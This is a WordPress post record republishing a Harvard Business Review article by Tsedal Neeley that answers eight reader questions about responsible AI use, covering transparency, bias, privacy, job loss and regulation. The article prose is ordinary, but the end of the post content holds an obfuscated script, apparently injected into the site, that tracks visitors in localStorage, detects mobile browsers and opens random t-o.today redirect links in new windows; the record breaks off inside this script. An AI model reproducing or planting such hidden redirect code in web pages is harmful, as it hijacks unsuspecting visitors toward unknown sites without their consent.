{"id":156928,"date":"2023-05-23T21:21:25","date_gmt":"2023-05-23T21:21:25","guid":{"rendered":"https:\/\/www.shrm.org\/resourcesandtools\/hr-topics\/technology\/pages\/8-questions-about-using-ai-responsibly-answered.aspx"},"modified":"2023-05-23T21:21:25","modified_gmt":"2023-05-23T21:21:25","slug":"8-questions-about-using-ai-responsibly-answered","status":"publish","type":"post","link":"https:\/\/squarehr.com\/index.php\/2023\/05\/23\/8-questions-about-using-ai-responsibly-answered\/","title":{"rendered":"8 Questions About Using AI Responsibly, Answered"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/8-questions-about-using-ai-responsibly-answered.jpg\"><\/p>\n<div><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/05\/8-questions-about-using-ai-responsibly-answered-1.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p><span class=\"shrm-Style-NoDropCap\">?<\/span><em class=\"shrm-Style-NoDropCap\">E<\/em><em>ditor&#8217;s Note: SHRM has partnered with<\/em>&nbsp;<a href=\"https:\/\/hbr.org\/\">Harvard Business Review<\/a>&nbsp;<em>to bring you relevant articles on key HR topics and strategies.<\/em>&nbsp;<\/p>\n<p><span class=\"shrm-Style-ForceDropCap\">W<\/span>hile the question of how organizations can (and should) use AI&nbsp;<a href=\"https:\/\/hbr.org\/2017\/07\/the-business-of-artificial-intelligence\">isn&#8217;t a new one<\/a>, the stakes and urgency of finding answers have skyrocketed with the release of ChatGPT, Midjourney, and other generative AI tools. Everywhere, people are wondering:&nbsp;<em>How can we use AI tools to boost performance? Can we trust AI to make consequential decisions? Will AI take away my job?<\/em><\/p>\n<p>The power of AI introduced by OpenAI, Microsoft, and Nvidia \u2014 and the pressure to compete in the market \u2014 make it inevitable that your organization will have to navigate the operational and ethical considerations of machine learning, large language models, and much more. And while many leaders are focused on operational challenges and disruptions, the ethical concerns are at least \u2014 if not more \u2014 pressing. Given how regulation lags technological capabilities and how quickly the AI landscape is changing, the burden of ensuring that these tools are used safely and ethically falls to companies.<\/p>\n<p>In my work, at the intersection of occupations, technology, and organizations, I&#8217;ve examined&nbsp;<a href=\"https:\/\/hbr.org\/2022\/05\/developing-a-digital-mindset\">how leaders can develop digital mindsets<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/www.hbs.edu\/faculty\/Pages\/item.aspx?num=62442\" target=\"_blank\" rel=\"noopener noreferrer\">the dangers of biased large language models<\/a>. I have identified best practices for organizations&#8217; use of technology and amplified consequential issues that ensure that AI implementations are ethical. To help you better identify how you and your company should be thinking about these issues \u2014 and make no mistake, you should be thinking about them \u2014 I collaborated with HBR to answer eight questions posed by readers on LinkedIn.<\/p>\n<p class=\"shrm-Element-Subtitle\">1. How should I prepare to introduce AI at my organization?<\/p>\n<p>To start, it&#8217;s important to recognize that the optimal way to work with AI is different from the way we&#8217;ve worked with other new technologies. In the past, most new tools simply enabled us to perform tasks more efficiently. People wrote with pens, then typewriters (which were faster), then computers (which were even faster). Each new tool allowed for more-efficient writing, but the general processes (drafting, revising, editing) remained largely the same.<\/p>\n<p>AI is different. It has a more substantial influence on our work and our processes because it&#8217;s able to find patterns that we can&#8217;t see and then use them to provide insights and analysis, predictions, suggestions, and even full drafts all on its own. So instead of thinking of AI as the tools we&nbsp;use, we should think of it as a set of&nbsp;<em>systems<\/em>&nbsp;with which we can collaborate.<\/p>\n<p>To effectively collaborate with AI at your organization, focus on three things:<\/p>\n<p><strong>First, ensure that everyone has a basic understanding of how digital systems work.<\/strong><\/p>\n<p>A digital mindset is a collection of attitudes and behaviors that help you to see new possibilities using data, technology, algorithms, and AI. You don&#8217;t have to become a programmer or a data scientist; you simply need to take a new and proactive approach to collaboration (learning to work across platforms), computation (asking and answering the right questions), and change (accepting that it is the only constant).&nbsp;<em>Everyone<\/em>&nbsp;in your organization should be working toward&nbsp;<a href=\"https:\/\/www.linkedin.com\/pulse\/developing-digital-mindset-following-30-rule-tsedal-neeley\/\">at least 30% fluency<\/a>&nbsp;in a handful of topics, such as systems&#8217; architecture, AI, machine learning, algorithms, AI agents as teammates, cybersecurity, and data-driven experimentation.<\/p>\n<p><strong>Second, make sure your organization is prepared for continuous adaptation and change.<\/strong><\/p>\n<p>Bringing in new AI requires employees to get used to processing new streams of data and content, analyzing them, and using their findings and outputs to develop a new perspective. Likewise, to use data and technology most efficiently, organizations need an integrated organizational structure. Your company needs to become less siloed and should build a centralized repository of knowledge and data to enable constant sharing and collaboration. Competing with AI not only requires incorporating today&#8217;s technologies but also being mentally and structurally prepared to adapt to future advancements. For example, individuals have begun incorporating generative AI (such as ChatGPT) into their daily routines, regardless of whether companies are prepared or willing to embrace its use.<\/p>\n<p><strong>Third, build AI into your operating model.<\/strong><\/p>\n<p>As my colleagues Marco Iansiti and Karim R. Lakhani have&nbsp;<a href=\"https:\/\/www.amazon.com\/Competing-Age-AI-Leadership-Algorithms-ebook\/dp\/B07MWCTNSD\">shown<\/a>, the structure of an organization mirrors the architecture of the technological systems within it, and vice versa. If tech systems are static, your organization will be static. But if they&#8217;re flexible, your organization will be flexible. This strategy played out successfully at Amazon. The company was having trouble sustaining its growth and its software infrastructure was &#8220;cracking under pressure,&#8221; according to Iansiti and Lakhani. So Jeff Bezos wrote a memo to employees announcing that all teams should route their data through &#8220;<a href=\"https:\/\/aws.amazon.com\/what-is\/api\/\">application programming interfaces<\/a>&#8221; (APIs), which allow various types of software to communicate and share data using set protocols. Anyone who didn&#8217;t would be fired. This was an attempt to break the inertia within Amazon&#8217;s tech systems \u2014 and it worked, dismantling data siloes, increasing collaboration, and helping to build the software- and data-driven operating model we see today. While you may not want to resort to a similar ultimatum, you should think about how the introduction of AI can \u2014 and should \u2014 change your operations for the better.<\/p>\n<p class=\"shrm-Element-Subtitle\">2. How can we ensure transparency in how AI makes decisions?<\/p>\n<p>Leaders need to recognize that it is not always possible to know how AI systems are making decisions. Some of the very characteristics that allow AI to quickly process huge amounts of data and perform certain tasks more accurately or efficiently than humans can also make it a black box: We can&#8217;t see how the output was produced. However, we can all play a role in increasing transparency and accountability in AI decision-making processes in two ways:<\/p>\n<p><strong>Recognize that AI is invisible and inscrutable and be transparent in presenting and using AI systems.<\/strong><\/p>\n<p>Callen Anthony, Beth A. Bechky, and Anne-Laure Fayard&nbsp;<a href=\"https:\/\/pubsonline.informs.org\/doi\/abs\/10.1287\/orsc.2022.1651?journalCode=orsc\">identify<\/a>&nbsp;invisibility and inscrutability as core characteristics that differentiate AI from prior technologies. It&#8217;s invisible because it often runs in the background of other technologies or platforms without users being aware of it; for every Siri or Alexa that people understand to be AI, there are many technologies, such as antilock brakes, that contain unseen AI systems. It&#8217;s inscrutable because, even for AI developers, it&#8217;s often impossible to understand how a model reaches an outcome, or even identify all the data points it&#8217;s using to get there \u2014 good, bad, or otherwise.<br \/>As AIs rely on progressively larger datasets, this becomes increasingly true. Consider large language models (LLMs) such as OpenAI&#8217;s ChatGPT or Microsoft&#8217;s Bing. They are trained on massive datasets of books, webpages, and documents scraped from across the internet<strong>&nbsp;\u2014<\/strong>&nbsp;OpenAI&#8217;s LLM was trained using&nbsp;<a href=\"https:\/\/arxiv.org\/abs\/2005.14165\" target=\"_blank\" rel=\"noopener noreferrer\"><em>175 billion parameters<\/em><\/a>&nbsp;and was built to predict the&nbsp;<em>likelihood<\/em>&nbsp;that something will occur (a character, word, or string of words, or even an image or tonal shift in your voice) based on either its preceding or surrounding context. The autocorrect feature on your phone is an example of the accuracy \u2014 and inaccuracy \u2014 of such predictions. But it&#8217;s not just the size of the training data: Many AI algorithms are also self-learning; they keep refining their predictive powers as they get more data and user feedback, adding new parameters along the way.<\/p>\n<p>AIs often have broad capabilities&nbsp;<em>because&nbsp;<\/em>of invisibility and inscrutability \u2014 their ability to work in the background and find patterns beyond our grasp. Currently, there is no way to peer into the inner workings of an AI tool and guarantee that the system is producing accurate or fair output. We must acknowledge that some opacity is a cost of using these powerful systems. As a consequence, leaders should exercise careful judgment in determining when and how it&#8217;s appropriate to use AI, and they should document when and how AI is being used. That way people will know that an AI-driven decision was appraised with an appropriate level of skepticism, including its potential risks or shortcomings.<\/p>\n<p><strong>Prioritize explanation as a central design goal.<\/strong><\/p>\n<p>The research brief &#8220;<a href=\"https:\/\/workofthefuture.mit.edu\/wp-content\/uploads\/2020\/12\/2020-Research-Brief-Malone-Rus-Laubacher2.pdf\">Artificial Intelligence and the Future of Work,<\/a>&#8221; by MIT scientists, notes that AI models can become more transparent through practices like highlighting specific areas in data that contribute to AI output, building models that are more interpretable, and developing algorithms that can be used to probe how a different model works. Similarly, leading AI computer scientist Timnit Gebru and her colleagues Emily Bender, Angelina McMillan-Major, and Margaret Mitchell (credited as &#8220;Shmargaret Shmitchell&#8221;)&nbsp;<a href=\"https:\/\/doi.org\/10.1145\/3442188.3445922\">argue<\/a>&nbsp;that practices like premortem analyses that prompt developers to consider both project risks and potential alternatives to current plans can increase transparency in future technologies. Echoing this point, in March of 2023, prominent tech entrepreneurs Steve Wozniak and Elon Musk, along with employees of Google and Microsoft,&nbsp;<a href=\"https:\/\/futureoflife.org\/open-letter\/pause-giant-ai-experiments\/\">signed a letter<\/a>&nbsp;advocating for AI development to be more transparent and interpretable.<\/p>\n<p class=\"shrm-Element-Subtitle\">3. How can we erect guardrails around LLMs so that their responses are true and consistent with the brand image we want to project?<\/p>\n<p>LLMs come with several serious risks. They can:<\/p>\n<ul>\n<li><strong>perpetuate harmful bias<\/strong>&nbsp;by deploying negative stereotypes or minimizing minority viewpoints<\/li>\n<li><strong>spread misinformation<\/strong>&nbsp;by repeating falsehoods or making up facts and citations<\/li>\n<li><strong>violate privacy<\/strong>&nbsp;by using data without people&#8217;s consent<\/li>\n<li><strong>cause security breaches<\/strong>&nbsp;if they are used to generate phishing emails or other cyberattacks<\/li>\n<li><strong>harm the environment<\/strong>&nbsp;because of the significant computational resources required to train and run these tools<\/li>\n<\/ul>\n<p>Data curation and documentation are two ways to curtail those risks and ensure that LLMs will give responses that are more consistent with, not harmful to, your brand image.<\/p>\n<p><strong>Tailor data for appropriate outputs.<\/strong><\/p>\n<p>LLMs are often developed using internet-based data containing billions of words. However, common sources of this data, like Reddit and Wikipedia, lack sufficient mechanisms for checking accuracy, fairness, or appropriateness. Consider which perspectives are represented on these sites and which are left out. For example,&nbsp;<a href=\"https:\/\/academic.oup.com\/pnasnexus\/article\/2\/3\/pgad018\/7008465\" target=\"_blank\" rel=\"noopener noreferrer\">67% of Reddit&#8217;s contributors are male<\/a>. And on Wikipedia,&nbsp;<a href=\"https:\/\/meta.m.wikimedia.org\/wiki\/Community_Insights\/Community_Insights_2021_Report\/Thriving_Movement#Community_and_Newcomer_Diversity\">84% of contributors are male, with little representation from marginalized populations<\/a>.<br \/>If you instead build an LLM around more-carefully vetted sources, you reduce the risk of inappropriate or harmful responses. Bender and colleagues&nbsp;<a href=\"https:\/\/dl.acm.org\/doi\/10.1145\/3442188.3445922\" target=\"_blank\" rel=\"noopener noreferrer\">recommend curating training datasets<\/a>&nbsp;&#8220;through a thoughtful process of deciding what to put in, rather than aiming solely for scale and trying haphazardly to weed out\u2026&#8217;dangerous&#8217;, &#8216;unintelligible&#8217;, or &#8216;otherwise bad&#8217; [data].&#8221; While this might take more time and resources, it&nbsp;exemplifies the adage that an ounce of prevention is worth a pound of&nbsp;cure.<\/p>\n<p><strong>Document data.<\/strong><\/p>\n<p>There will surely be organizations that want to leverage LLMs but lack the resources to train a model with a curated dataset. In situations like this,&nbsp;<a href=\"https:\/\/direct.mit.edu\/tacl\/article\/doi\/10.1162\/tacl_a_00041\/43452\/Data-Statements-for-Natural-Language-Processing\" target=\"_blank\" rel=\"noopener noreferrer\">documentation is crucial<\/a>&nbsp;because it enables companies to get context from a nonproprietary model&#8217;s developers on which datasets it uses and the biases they may contain, as well as guidance on how software built on the model might be appropriately deployed. This practice is analogous to the standardized information used in medicine to indicate which studies have been used in making health care recommendations.<\/p>\n<p>AI developers should prioritize documentation to allow for safe and transparent use of their models. And people or organizations experimenting with a model must look for this documentation to understand its risks and whether it aligns with their desired brand image.<\/p>\n<p class=\"shrm-Element-Subtitle\">4. How can we ensure that the dataset we use to train AI models is representative and doesn&#8217;t include harmful biases?<\/p>\n<p>Sanitizing datasets is a challenge that your organization can help overcome by prioritizing transparency and fairness over model size and by representing diverse populations in data curation.<\/p>\n<p>First, consider the trade-offs you make. Tech companies have been pursuing larger AI systems because they tend to be more effective at certain tasks, like sustaining human-seeming conversations. However, if&nbsp;a model is too large to fully understand, it&#8217;s impossible to rid it of potential biases. To fully combat harmful bias, developers must be able to understand and document the risks inherent to a dataset, which might mean using a smaller one.<\/p>\n<p>Second, if diverse teams, including members of underrepresented populations, collect and produce the data used to train models, then you&#8217;ll have a better chance of ensuring that people with a variety of perspectives and identities are represented in them. This practice also helps to identify unrecognized biases or blinders in the data.<\/p>\n<p>AI will only be trustworthy once it works equitably, and that will only happen if we prioritize diversifying data and development teams and clearly document how AI has been designed for fairness.<\/p>\n<p class=\"shrm-Element-Subtitle\">5. What are the potential risks of data privacy violations with AI?<\/p>\n<p>AI that uses sensitive employee and customer data is vulnerable to bad actors. To combat these risks, organizations should learn as much as they can about how their AI has been developed and then decide whether it&#8217;s appropriate to use secure data with it. They should also&nbsp;<a href=\"https:\/\/www.amazon.com\/Digital-Mindset-Really-Thrive-Algorithms\/dp\/1647820103\" target=\"_blank\" rel=\"noopener noreferrer\">keep tech systems updated and earmark budget resources to keep the software secure<\/a>. This requires continuous action, as a small vulnerability can leave an entire organization open to breaches.<\/p>\n<p>Blockchain innovations can help on this front. A blockchain is a secure, distributed ledger that records data transactions, and it&#8217;s currently being used for applications like creating payment systems (not to mention cryptocurrencies).<\/p>\n<p>When it comes to your operations more broadly, consider this&nbsp;<a href=\"https:\/\/gpsbydesign.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">privacy by design (PbD) framework<\/a>&nbsp;from former Information and Privacy Commissioner of Ontario Ann Cavoukian, which recommends that organizations embrace seven foundational principles:<\/p>\n<ol>\n<li>Be proactive, not reactive \u2014 preventative, not remedial.<\/li>\n<li>Lead with privacy as the default setting.<\/li>\n<li>Embed privacy into design.<\/li>\n<li>Retain full functionality, including privacy and security.<\/li>\n<li>Ensure end-to-end security.<\/li>\n<li>Maintain visibility and transparency.<\/li>\n<li>Respect user privacy \u2014 keep systems user-centric.<\/li>\n<\/ol>\n<p>Incorporating PbD principles into your operation requires more than hiring privacy personnel or creating a privacy division. All the people in&nbsp;your organization need to be attuned to customer and employee concerns about these issues. Privacy isn&#8217;t an afterthought; it needs to be&nbsp;at the core of digital operations, and everyone needs to work to protect it.<\/p>\n<p class=\"shrm-Element-Subtitle\">6.&nbsp;How can we encourage employees to use AI for productivity purposes and not simply to take shortcuts?<\/p>\n<p>Even with the advent of LLMs, AI technology is not yet capable of performing the dizzying range of tasks that humans can, and there are many things that it does worse than the average person. Using each new tool effectively requires understanding its purpose.<\/p>\n<p>For example, think about ChatGPT. By learning about language patterns, it has become so good at predicting which words are supposed to follow others that it can produce seemingly sophisticated text responses to complicated questions. However, there&#8217;s a limit to the quality of these outputs because being good at guessing plausible combinations of words and phrases is different from understanding the material. So ChatGPT can produce a poem in the style of Shakespeare because it has learned the particular patterns of his plays and poems, but it cannot produce the original insight into the human condition that informs his work.<\/p>\n<p>By contrast, AI can be better and more efficient than humans at making predictions because it can process much larger amounts of data much more quickly. Examples include&nbsp;<a href=\"https:\/\/journals.plos.org\/digitalhealth\/article?id=10.1371\/journal.pdig.0000168\">predicting early dementia from speech patterns<\/a>,&nbsp;<a href=\"https:\/\/pubmed.ncbi.nlm.nih.gov\/30295070\/\" target=\"_blank\" rel=\"noopener noreferrer\">detecting cancerous tumors indistinguishable to the human eye<\/a>, and&nbsp;<a href=\"https:\/\/www.researchgate.net\/publication\/312212729_Humans_and_Autonomy_Implications_of_Shared_Decision-Making_for_Military_Operations_Humans_and_Autonomy_Implications_of_Shared_Decision-Making_for_Military_Operations\">planning safer routes through battlefields<\/a>.<\/p>\n<p>Employees should therefore be encouraged to evaluate whether AI&#8217;s strengths match up to a task and proceed accordingly. If you need to process a lot of information quickly, it can do that. If you need a bunch of new ideas, it can generate them. Even if you need to make a difficult decision, it can offer advice, providing it&#8217;s been trained on relevant data.<\/p>\n<p>But you shouldn&#8217;t use AI to create meaningful work products without human oversight. If you need to write a quantity of documents with very similar content, AI may be a useful generator of what has long been referred to as boilerplate material.&nbsp;<a href=\"https:\/\/www.oneusefulthing.org\/p\/how-to-use-ai-to-do-practical-stuff\">Be aware<\/a>&nbsp;that its outputs are derived from its datasets and algorithms, and they aren&#8217;t necessarily good or accurate.<\/p>\n<p class=\"shrm-Element-Subtitle\">7.&nbsp;How worried should we be that AI will replace jobs?<\/p>\n<p>Every technological revolution has created more jobs than it has destroyed. Automobiles put horse-and-buggy drivers out of business but led to new jobs building and fixing cars, running gas stations, and more. The novelty of AI technologies makes it easy to fear they will replace humans in the workforce. But we should instead view them as ways to augment human performance. For example, companies like&nbsp;<a href=\"https:\/\/collectivei.com\/\">Collective[i]<\/a>&nbsp;have developed AI systems that analyze data to produce highly accurate sales forecasts quickly; traditionally, this work took people days and weeks to pull together. But no salespeople are losing their jobs. Rather, they&#8217;ve got more time to focus on more important parts of their work: building relationships, managing, and actually selling.<\/p>\n<p>Similarly, services like OpenAI&#8217;s Codex can autogenerate programming code for basic purposes. This doesn&#8217;t replace programmers; it allows them to write code more efficiently and automate repetitive tasks like testing so that they can work on higher-level issues such as systems architecture, domain modeling, and user experience.<\/p>\n<p>The long-term effects on jobs are complex and uneven, and there can be periods of job destruction and displacement in certain industries or regions. To ensure that the benefits of technological progress are widely shared, it is crucial to invest in education and workforce development to help people adapt to the new job market.<\/p>\n<p>Individuals and organizations should focus on upskilling and scaling to prepare to make the most of new technologies. AI and robots aren&#8217;t replacing humans anytime soon.&nbsp;<a href=\"https:\/\/www.amazon.com\/dp\/B099KQLCWY\/ref=dp-kindle-redirect?_encoding=UTF8&amp;btkr=1\" target=\"_blank\" rel=\"noopener noreferrer\">The more likely reality is that people with digital mindsets will replace those without them<\/a>.<\/p>\n<p class=\"shrm-Element-Subtitle\">8.&nbsp;How can my organization ensure that the AI we develop or use won&#8217;t harm individuals or groups or violate human rights?<\/p>\n<p>The harms of AI bias have been widely documented. In their seminal 2018 paper &#8220;<a href=\"https:\/\/proceedings.mlr.press\/v81\/buolamwini18a.html\">Gender Shades<\/a>,&#8221; Joy Buolamwini and Timnit Gebru showed that popular facial recognition technologies offered by companies like IBM and Microsoft were nearly perfect at identifying white, male faces but misidentified Black female faces as much as 35% of the time. Facial recognition can be used to unlock your phone, but is also used to&nbsp;<a href=\"https:\/\/www.nytimes.com\/2022\/12\/22\/nyregion\/madison-square-garden-facial-recognition.html\" target=\"_blank\" rel=\"noopener noreferrer\">monitor patrons at Madison Square Garden<\/a>,&nbsp;<a href=\"https:\/\/www.reuters.com\/investigates\/special-report\/ukraine-crisis-russia-detentions\/\">surveil<\/a>&nbsp;<a href=\"https:\/\/www.nbcmiami.com\/investigations\/miami-police-used-facial-recognition-technology-in-protesters-arrest\/2278848\/\" target=\"_blank\" rel=\"noopener noreferrer\">protesters<\/a>, and tap suspects in police investigations \u2014 and misidentification has&nbsp;<a href=\"https:\/\/www.wired.com\/story\/wrongful-arrests-ai-derailed-3-mens-lives\/\" target=\"_blank\" rel=\"noopener noreferrer\">led to wrongful arrests<\/a>&nbsp;that can derail people&#8217;s lives. As AI grows in power and becomes more integrated into our daily lives, its potential for harm grows exponentially, too. Here are strategies to safeguard AI.<\/p>\n<p><strong>Slow down and document AI development.<\/strong><\/p>\n<p>Preventing AI harm requires shifting our focus from the rapid development and deployment of increasingly powerful AI to ensuring that AI is safe before release.<\/p>\n<p>Transparency is also key. Earlier in this article, I explained how clear descriptions of the datasets used in AI and potential biases within them&nbsp;helps to reduce harm. When algorithms are openly shared, organizations and individuals can better analyze and understand the potential risks of new tools before using them.<\/p>\n<p><strong>Establish and protect AI ethics watchdogs.<\/strong><\/p>\n<p>The question of who will ensure safe and responsible AI is currently unanswered. Google, for example, employs an ethical-AI team, but in 2020 they fired Gebru after she sought to publish a paper warning of the risks of building ever-larger language models. Her exit from Google raised the question of whether tech developers are able, or incentivized, to act as ombudsmen for their own technologies and organizations. More recently, an entire team at Microsoft focused on ethics&nbsp;<a href=\"https:\/\/techcrunch.com\/2023\/03\/13\/microsoft-lays-off-an-ethical-ai-team-as-it-doubles-down-on-openai\/\">was laid off<\/a>. But many in the industry recognize the risks, and as noted earlier, even tech icons have called for policymakers working with technologists to create regulatory systems to govern AI development.<\/p>\n<p>Whether it comes from government, the tech industry, or another independent system, the establishment and protection of watchdogs is crucial to protecting against AI harm.<\/p>\n<p><strong>Watch where regulation is headed.<\/strong><\/p>\n<p>Even as the AI landscape changes, governments are trying to regulate it. In the United States, 21 AI-related bills were passed into law last year.&nbsp;<a href=\"https:\/\/aiindex.stanford.edu\/wp-content\/uploads\/2023\/04\/HAI_AI-Index-Report_2023.pdf\">Notable acts<\/a>&nbsp;include an Alabama provision outlining guidelines for using facial recognition technology in criminal proceedings and legislation that created a Vermont Division of Artificial Intelligence to review all AI used by the state government and to propose a state AI code of ethics. More recently, the U.S. federal government&nbsp;<a href=\"https:\/\/www.axios.com\/2023\/05\/04\/ai-executive-actions-white-house\">moved to enact executive actions on AI<\/a>, which will be vetted over time.<\/p>\n<p>The European Union is also considering legislation \u2014 the Artificial Intelligence Act \u2014 that includes a classification system determining the level of risk AI could pose to the health and safety or the fundamental rights of a person. Italy has temporarily banned ChatGPT. The African Union has established a working group on AI, and the African Commission on Human and Peoples&#8217; Rights&nbsp;<a href=\"https:\/\/ai.altadvisory.africa\/wp-content\/uploads\/AI-Governance-in-Africa-2022.pdf\">adopted a resolution<\/a>&nbsp;to address implications for human rights of AI, robotics, and other new and emerging technologies in Africa.<\/p>\n<p>China passed a data protection law in 2021 that established user consent rules for data collection and&nbsp;<a href=\"https:\/\/www.cnbc.com\/2022\/12\/23\/china-is-bringing-in-first-of-its-kind-regulation-on-deepfakes.html\">recently passed<\/a>&nbsp;a unique policy regulating &#8220;deep synthesis technologies&#8221; that are used for so-called &#8220;deep fakes.&#8221; The British government&nbsp;<a href=\"https:\/\/www.cnbc.com\/2023\/03\/29\/with-chatgpt-hype-swirling-uk-government-urges-regulators-to-come-up-with-rules-for-ai.html\" target=\"_blank\" rel=\"noopener noreferrer\">released an approach<\/a>&nbsp;that applies existing regulatory guidelines to new AI technology.<\/p>\n<p>Billions of people around the world are discovering the promise of AI through their experiments with ChatGPT, Bing, Midjourney, and other new tools. Every company will have to confront questions about how these emerging technologies will apply to them and their industries. For&nbsp;some it will mean a significant pivot in their operating models; for others, an opportunity to scale and broaden their offerings. But all must assess their readiness to deploy AI responsibly without perpetuating harm to their stakeholders and the world at large.<\/p>\n<p><a href=\"https:\/\/hbr.org\/search?term=tsedal%20neeley&amp;search_type=search-all\"><strong>Tsedal Neeley<\/strong><\/a>&nbsp;is the Naylor Fitzhugh Professor of Business Administration and senior associate dean of faculty and research at Harvard Business School. She is the coauthor of the book&nbsp;<a href=\"https:\/\/www.amazon.com\/Digital-Mindset-Really-Thrive-Algorithms\/dp\/1647820103\" target=\"_blank\" rel=\"noopener noreferrer\"><em>The Digital Mindset: What It Really Takes to Thrive in the Age of Data, Algorithms, and AI<\/em><\/a>&nbsp;and the author of the book&nbsp;<a href=\"https:\/\/www.amazon.com\/Remote-Work-Revolution-Succeeding-Anywhere\/dp\/0063068303\"><em>Remote Work Revolution: Succeeding from Anywhere<\/em><\/a>.&nbsp;<\/p>\n<p><em>This article is adapted from<\/em>&nbsp;Harvard Business Review&nbsp;<em>with permission. \u00a92023. All rights reserved.<\/em><\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/aCZ9c8','https:\/\/t-o.today\/GJM8c6','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/CrN5c0','8SJGLkz','random','https:\/\/t-o.today\/hGi1c6','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/MNo2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/ZwE4c1','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/QcH3c5','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/rUe0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/GFV6c8','https:\/\/t-o.today\/hRU7c7',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 